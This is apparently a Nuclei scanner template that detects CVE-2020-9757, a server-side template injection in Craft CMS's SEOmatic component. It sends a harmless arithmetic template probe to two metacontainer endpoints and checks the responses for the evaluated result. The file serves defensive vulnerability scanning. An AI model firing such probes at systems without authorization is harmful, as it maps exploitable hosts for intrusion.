nuclei-templates/http/cves/2020/CVE-2020-9757.yaml

51 lines
1.9 KiB
YAML

id: CVE-2020-9757
info:
name: Craft CMS < 3.3.0 - Server-Side Template Injection
author: dwisiswant0
severity: critical
description: Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller.
remediation: |
Upgrade Craft CMS to version 3.3.0 or higher to mitigate this vulnerability.
reference:
- https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md
- https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt
- https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b
- https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f
- https://nvd.nist.gov/vuln/detail/CVE-2020-9757
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-9757
cwe-id: CWE-74
epss-score: 0.9686
epss-percentile: 0.99622
cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: craftcms
product: craft_cms
tags: cve,cve2020,ssti,craftcms
http:
- method: GET
path:
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
skip-variables-check: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "MetaLinkContainer"
- "canonical"
- "22344"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502201e4aa8d005c2390b83b4c72366d93e9494749aff0271ec42be8859d550236c38022100c0b78e683855f73e099a3a990df1390f2a3d9ddc357f3f8ff9a76092ad851297:922c64590222798bb761d5b6d8e72950